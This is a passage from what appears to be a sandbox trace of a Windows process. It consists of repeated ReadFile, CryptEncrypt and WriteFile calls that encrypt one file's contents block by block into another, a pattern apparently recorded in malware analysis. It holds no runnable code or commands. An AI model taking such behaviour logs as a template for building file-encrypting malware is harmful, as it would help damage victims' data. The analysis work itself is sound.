nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.496] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.496] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.496] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.496] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.496] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.496] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.496] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.496] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.496] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.497] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.497] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.497] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.497] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.497] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.497] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.497] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.497] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.497] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.497] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.497] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.497] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.497] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.497] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.497] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.498] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.498] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.498] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.498] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.498] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.498] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.498] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.498] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.498] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.498] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.498] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.498] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.498] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.499] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.499] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.499] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.499] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.499] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.499] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.499] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.499] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.499] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.499] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.499] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.499] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.499] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.499] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.500] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.500] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.500] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.500] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.500] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.500] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.500] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.500] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.500] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.500] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.500] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.500] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.500] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.500] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.500] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.501] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.501] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.501] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.501] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.501] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.501] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.501] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.501] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.501] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.501] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.501] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.501] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.501] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.501] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.502] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.502] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.502] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.502] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.503] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.503] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.503] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.504] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.504] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.504] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.505] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.505] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.505] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.505] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.505] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.505] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.505] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.505] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.505] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, 